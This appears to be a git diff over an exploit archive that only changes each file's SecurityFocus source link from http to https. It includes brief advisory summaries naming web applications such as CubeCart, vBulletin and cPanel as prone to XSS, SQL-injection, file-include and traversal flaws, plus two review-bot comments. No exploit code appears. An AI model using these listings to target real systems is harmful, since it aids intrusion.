-source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28629.txt b/exploits/php/webapps/28629.txt index 92edc7584..141d03f6f 100644 --- a/exploits/php/webapps/28629.txt +++ b/exploits/php/webapps/28629.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28630.txt b/exploits/php/webapps/28630.txt index 5c7a3b725..68c940ced 100644 --- a/exploits/php/webapps/28630.txt +++ b/exploits/php/webapps/28630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28631.txt b/exploits/php/webapps/28631.txt index 9dfc8bf0d..62a8e384d 100644 --- a/exploits/php/webapps/28631.txt +++ b/exploits/php/webapps/28631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28632.txt b/exploits/php/webapps/28632.txt index ad5871c27..a5619044b 100644 --- a/exploits/php/webapps/28632.txt +++ b/exploits/php/webapps/28632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28633.txt b/exploits/php/webapps/28633.txt index e90570543..836b76a69 100644 --- a/exploits/php/webapps/28633.txt +++ b/exploits/php/webapps/28633.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28634.txt b/exploits/php/webapps/28634.txt index 6c5810b3d..2e8be657d 100644 --- a/exploits/php/webapps/28634.txt +++ b/exploits/php/webapps/28634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28635.txt b/exploits/php/webapps/28635.txt index cd8233a5b..785e1aa48 100644 --- a/exploits/php/webapps/28635.txt +++ b/exploits/php/webapps/28635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28636.txt b/exploits/php/webapps/28636.txt index 332e8d788..cace1c10c 100644 --- a/exploits/php/webapps/28636.txt +++ b/exploits/php/webapps/28636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28637.txt b/exploits/php/webapps/28637.txt index 4a4cf958f..b68014d62 100644 --- a/exploits/php/webapps/28637.txt +++ b/exploits/php/webapps/28637.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28638.txt b/exploits/php/webapps/28638.txt index d35747162..e260f313f 100644 --- a/exploits/php/webapps/28638.txt +++ b/exploits/php/webapps/28638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20137/info +source: https://www.securityfocus.com/bid/20137/info Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28644.txt b/exploits/php/webapps/28644.txt index 33c730daf..c79646fc6 100644 --- a/exploits/php/webapps/28644.txt +++ b/exploits/php/webapps/28644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20149/info +source: https://www.securityfocus.com/bid/20149/info The Google Mini Search Appliance is prone to an information-disclosure vulnerability. diff --git a/exploits/php/webapps/28645.txt b/exploits/php/webapps/28645.txt index b60e4e62a..fffa29350 100644 --- a/exploits/php/webapps/28645.txt +++ b/exploits/php/webapps/28645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20150/info +source: https://www.securityfocus.com/bid/20150/info CakePHP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28646.txt b/exploits/php/webapps/28646.txt index bd540b6c7..bc34398ac 100644 --- a/exploits/php/webapps/28646.txt +++ b/exploits/php/webapps/28646.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20153/info +source: https://www.securityfocus.com/bid/20153/info MySource products are prone to multiple input-validation vulnerabilities. Exploiting these issues will allow an attacker to manipulate the application into becoming an HTTP proxy and to conduct cross-site scripting attacks. diff --git a/exploits/php/webapps/28647.txt b/exploits/php/webapps/28647.txt index a4e936ff0..7d1837717 100644 --- a/exploits/php/webapps/28647.txt +++ b/exploits/php/webapps/28647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20155/info +source: https://www.securityfocus.com/bid/20155/info PLESK is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28658.txt b/exploits/php/webapps/28658.txt index 95393dc0f..4d387e465 100644 --- a/exploits/php/webapps/28658.txt +++ b/exploits/php/webapps/28658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20160/info +source: https://www.securityfocus.com/bid/20160/info MyPhotos is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28660.php b/exploits/php/webapps/28660.php index 57dfc3c85..e7ffc35ae 100644 --- a/exploits/php/webapps/28660.php +++ b/exploits/php/webapps/28660.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20163/info +source: https://www.securityfocus.com/bid/20163/info cPanel is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/php/webapps/28661.txt b/exploits/php/webapps/28661.txt index e399baac7..26354864e 100644 --- a/exploits/php/webapps/28661.txt +++ b/exploits/php/webapps/28661.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20170/info +source: https://www.securityfocus.com/bid/20170/info toendaCMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28662.txt b/exploits/php/webapps/28662.txt index e8bb0f513..08d3db60a 100644 --- a/exploits/php/webapps/28662.txt +++ b/exploits/php/webapps/28662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20172/info +source: https://www.securityfocus.com/bid/20172/info Photostore is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28663.txt b/exploits/php/webapps/28663.txt index 9a62a957d..859b6d3ba 100644 --- a/exploits/php/webapps/28663.txt +++ b/exploits/php/webapps/28663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20172/info +source: https://www.securityfocus.com/bid/20172/info Photostore is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28664.txt b/exploits/php/webapps/28664.txt index c340666fd..ea6c21205 100644 --- a/exploits/php/webapps/28664.txt +++ b/exploits/php/webapps/28664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20174/info +source: https://www.securityfocus.com/bid/20174/info Opial Audio/Visual Download Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28665.txt b/exploits/php/webapps/28665.txt index 2ba1c8fcb..e261db2e6 100644 --- a/exploits/php/webapps/28665.txt +++ b/exploits/php/webapps/28665.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20178/info +source: https://www.securityfocus.com/bid/20178/info WWWThreads is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28667.txt b/exploits/php/webapps/28667.txt index 2172e07ac..3613d998d 100644 --- a/exploits/php/webapps/28667.txt +++ b/exploits/php/webapps/28667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28668.txt b/exploits/php/webapps/28668.txt index afbfe998a..6310043e3 100644 --- a/exploits/php/webapps/28668.txt +++ b/exploits/php/webapps/28668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info   BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.   diff --git a/exploits/php/webapps/28669.txt b/exploits/php/webapps/28669.txt index e6afc0367..c744eec00 100644 --- a/exploits/php/webapps/28669.txt +++ b/exploits/php/webapps/28669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20202/info +source: https://www.securityfocus.com/bid/20202/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28670.txt b/exploits/php/webapps/28670.txt index 25764ee1a..cf29e9912 100644 --- a/exploits/php/webapps/28670.txt +++ b/exploits/php/webapps/28670.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20203/info +source: https://www.securityfocus.com/bid/20203/info DanPHPSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28671.txt b/exploits/php/webapps/28671.txt index b4e8b153a..d25c1b42e 100644 --- a/exploits/php/webapps/28671.txt +++ b/exploits/php/webapps/28671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20203/info +source: https://www.securityfocus.com/bid/20203/info DanPHPSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28672.pl b/exploits/php/webapps/28672.pl index 71b982b33..3be8b53a7 100755 --- a/exploits/php/webapps/28672.pl +++ b/exploits/php/webapps/28672.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20204/info +source: https://www.securityfocus.com/bid/20204/info bbsNew is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28673.txt b/exploits/php/webapps/28673.txt index 1dbbef07b..edb580697 100644 --- a/exploits/php/webapps/28673.txt +++ b/exploits/php/webapps/28673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20205/info +source: https://www.securityfocus.com/bid/20205/info Exporia is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28674.pl b/exploits/php/webapps/28674.pl index dd89c9edc..fcdbc26d9 100755 --- a/exploits/php/webapps/28674.pl +++ b/exploits/php/webapps/28674.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28675.txt b/exploits/php/webapps/28675.txt index c74438a88..424983948 100644 --- a/exploits/php/webapps/28675.txt +++ b/exploits/php/webapps/28675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28676.txt b/exploits/php/webapps/28676.txt index 7cb0747cc..f49c08123 100644 --- a/exploits/php/webapps/28676.txt +++ b/exploits/php/webapps/28676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20207/info +source: https://www.securityfocus.com/bid/20207/info Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28686.txt b/exploits/php/webapps/28686.txt index 956e1a866..de7606dd1 100644 --- a/exploits/php/webapps/28686.txt +++ b/exploits/php/webapps/28686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20208/info +source: https://www.securityfocus.com/bid/20208/info My-BIC is prone to a remote file-include vulnerability because these applications fail to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28687.txt b/exploits/php/webapps/28687.txt index 1d2a6fb83..f2f33bf80 100644 --- a/exploits/php/webapps/28687.txt +++ b/exploits/php/webapps/28687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
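Review bot: in the 28668.txt hunk, the context lines around the description carry whitespace characters where the sibling hunks for 28667.txt and 28669.txt (same BID 20202 text) have plain blank lines. As this is a bulk header rewrite, strip that whitespace in the same pass or in a follow-up so the three records stay identical apart from their index hashes.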
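Review bot: 28672.pl and 28674.pl are recorded with mode 100755, yet line 1 in both hunks is the bare text "source: https://www.securityfocus.com/bid/.../info" followed by prose description lines, with no comment marker visible. An archive record that opens with prose should not carry the executable bit. Since this pass already touches line 1 of both files, consider storing them as 100644 like the .txt entries (and 28660.php) so that mode and content agree.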
diff --git a/exploits/php/webapps/28688.txt b/exploits/php/webapps/28688.txt index 47eb0e5c8..b6f691f8e 100644 --- a/exploits/php/webapps/28688.txt +++ b/exploits/php/webapps/28688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28689.txt b/exploits/php/webapps/28689.txt index fa74f8b72..17cb23377 100644 --- a/exploits/php/webapps/28689.txt +++ b/exploits/php/webapps/28689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28690.txt b/exploits/php/webapps/28690.txt index 4b2a8d47b..02893337f 100644 --- a/exploits/php/webapps/28690.txt +++ b/exploits/php/webapps/28690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20209/info +source: https://www.securityfocus.com/bid/20209/info PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28691.txt b/exploits/php/webapps/28691.txt index 71262de49..f63ed7c1e 100644 --- a/exploits/php/webapps/28691.txt +++ b/exploits/php/webapps/28691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20210/info +source: https://www.securityfocus.com/bid/20210/info Quickblogger is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28692.txt b/exploits/php/webapps/28692.txt index 3a68c6090..fabc34917 100644 --- a/exploits/php/webapps/28692.txt +++ b/exploits/php/webapps/28692.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20212/info +source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28693.txt b/exploits/php/webapps/28693.txt index 431a225a9..c18785d09 100644 --- a/exploits/php/webapps/28693.txt +++ b/exploits/php/webapps/28693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20212/info +source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28694.txt b/exploits/php/webapps/28694.txt index f83ff9f0f..555185be4 100644 --- a/exploits/php/webapps/28694.txt +++ b/exploits/php/webapps/28694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20214/info +source: https://www.securityfocus.com/bid/20214/info vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28695.txt b/exploits/php/webapps/28695.txt index da7f2de53..25dc0c505 100644 --- a/exploits/php/webapps/28695.txt +++ b/exploits/php/webapps/28695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28696.txt b/exploits/php/webapps/28696.txt index b4909725b..35ed9c5d0 100644 --- a/exploits/php/webapps/28696.txt +++ b/exploits/php/webapps/28696.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28697.txt b/exploits/php/webapps/28697.txt index 20b4f14d5..a37455dcc 100644 --- a/exploits/php/webapps/28697.txt +++ b/exploits/php/webapps/28697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28698.txt b/exploits/php/webapps/28698.txt index 5f78286a4..4c308c2b1 100644 --- a/exploits/php/webapps/28698.txt +++ b/exploits/php/webapps/28698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28699.txt b/exploits/php/webapps/28699.txt index e4fc84e58..c57a39fa7 100644 --- a/exploits/php/webapps/28699.txt +++ b/exploits/php/webapps/28699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28700.txt b/exploits/php/webapps/28700.txt index 4eec1d2fc..18fa0a084 100644 --- a/exploits/php/webapps/28700.txt +++ b/exploits/php/webapps/28700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28701.txt b/exploits/php/webapps/28701.txt index f68fe608f..821a7ccc8 100644 --- a/exploits/php/webapps/28701.txt +++ b/exploits/php/webapps/28701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28702.txt b/exploits/php/webapps/28702.txt index 2405e51c4..faa0057d3 100644 --- a/exploits/php/webapps/28702.txt +++ b/exploits/php/webapps/28702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28703.txt b/exploits/php/webapps/28703.txt index 08f225d36..43d7cbff8 100644 --- a/exploits/php/webapps/28703.txt +++ b/exploits/php/webapps/28703.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28704.txt b/exploits/php/webapps/28704.txt index 44fa7fcd9..2c5dea681 100644 --- a/exploits/php/webapps/28704.txt +++ b/exploits/php/webapps/28704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20215/info +source: https://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28711.txt b/exploits/php/webapps/28711.txt index bd64f65dd..cca686ff7 100644 --- a/exploits/php/webapps/28711.txt +++ b/exploits/php/webapps/28711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20221/info +source: https://www.securityfocus.com/bid/20221/info PHP Invoice is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28714.txt b/exploits/php/webapps/28714.txt index d29631d7d..a08600b44 100644 --- a/exploits/php/webapps/28714.txt +++ b/exploits/php/webapps/28714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20231/info +source: https://www.securityfocus.com/bid/20231/info PHPSelect Web Development is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28716.txt b/exploits/php/webapps/28716.txt index a5cd6bade..0a114a293 100644 --- a/exploits/php/webapps/28716.txt +++ b/exploits/php/webapps/28716.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20232/info +source: https://www.securityfocus.com/bid/20232/info MKPortal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28719.txt b/exploits/php/webapps/28719.txt index 626442914..79c6e525a 100644 --- a/exploits/php/webapps/28719.txt +++ b/exploits/php/webapps/28719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20236/info +source: https://www.securityfocus.com/bid/20236/info VirtueMart Joomla eCommerce Edition is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28720.txt b/exploits/php/webapps/28720.txt index aeab4b906..52f645ec3 100644 --- a/exploits/php/webapps/28720.txt +++ b/exploits/php/webapps/28720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20239/info +source: https://www.securityfocus.com/bid/20239/info Web//News is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28721.txt b/exploits/php/webapps/28721.txt index ad88d1d4d..234bfbacb 100644 --- a/exploits/php/webapps/28721.txt +++ b/exploits/php/webapps/28721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20243/info +source: https://www.securityfocus.com/bid/20243/info Red Mombin is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28722.txt b/exploits/php/webapps/28722.txt index 50e93ba3a..4d16612df 100644 --- a/exploits/php/webapps/28722.txt +++ b/exploits/php/webapps/28722.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20243/info +source: https://www.securityfocus.com/bid/20243/info Red Mombin is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28727.txt b/exploits/php/webapps/28727.txt index af1f0930d..062f3ffa7 100644 --- a/exploits/php/webapps/28727.txt +++ b/exploits/php/webapps/28727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20259/info +source: https://www.securityfocus.com/bid/20259/info Les Visiteurs is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28728.txt b/exploits/php/webapps/28728.txt index 83bf0dde7..1ba8943b0 100644 --- a/exploits/php/webapps/28728.txt +++ b/exploits/php/webapps/28728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20272/info +source: https://www.securityfocus.com/bid/20272/info Geotarget is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28729.txt b/exploits/php/webapps/28729.txt index 345740674..cd5aaffb6 100644 --- a/exploits/php/webapps/28729.txt +++ b/exploits/php/webapps/28729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20277/info +source: https://www.securityfocus.com/bid/20277/info phpBB XS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28730.txt b/exploits/php/webapps/28730.txt index 255cee46b..caa86c594 100644 --- a/exploits/php/webapps/28730.txt +++ b/exploits/php/webapps/28730.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20278/info +source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28731.txt b/exploits/php/webapps/28731.txt index 43618da86..594eede80 100644 --- a/exploits/php/webapps/28731.txt +++ b/exploits/php/webapps/28731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20278/info +source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28732.txt b/exploits/php/webapps/28732.txt index da2b6a907..080aa6db3 100644 --- a/exploits/php/webapps/28732.txt +++ b/exploits/php/webapps/28732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28733.txt b/exploits/php/webapps/28733.txt index 21cf43722..e0a8cb476 100644 --- a/exploits/php/webapps/28733.txt +++ b/exploits/php/webapps/28733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28734.txt b/exploits/php/webapps/28734.txt index 335bfacc2..3f82442d2 100644 --- a/exploits/php/webapps/28734.txt +++ b/exploits/php/webapps/28734.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20280/info +source: https://www.securityfocus.com/bid/20280/info Yblog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28736.txt b/exploits/php/webapps/28736.txt index 196c1e36e..758c806f7 100644 --- a/exploits/php/webapps/28736.txt +++ b/exploits/php/webapps/28736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20292/info +source: https://www.securityfocus.com/bid/20292/info DeluxeBB is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28737.txt b/exploits/php/webapps/28737.txt index 207d299d8..5082fcbda 100644 --- a/exploits/php/webapps/28737.txt +++ b/exploits/php/webapps/28737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20295/info +source: https://www.securityfocus.com/bid/20295/info Easy Banner is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28738.txt b/exploits/php/webapps/28738.txt index a58118eca..069bf0cce 100644 --- a/exploits/php/webapps/28738.txt +++ b/exploits/php/webapps/28738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20297/info +source: https://www.securityfocus.com/bid/20297/info digiSHOP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28740.txt b/exploits/php/webapps/28740.txt index 21c4815f1..86d533694 100644 --- a/exploits/php/webapps/28740.txt +++ b/exploits/php/webapps/28740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20311/info +source: https://www.securityfocus.com/bid/20311/info HAMweather is prone to a script-code-injection vulnerability because it fails to sufficiently sanitize user-supplied data. 
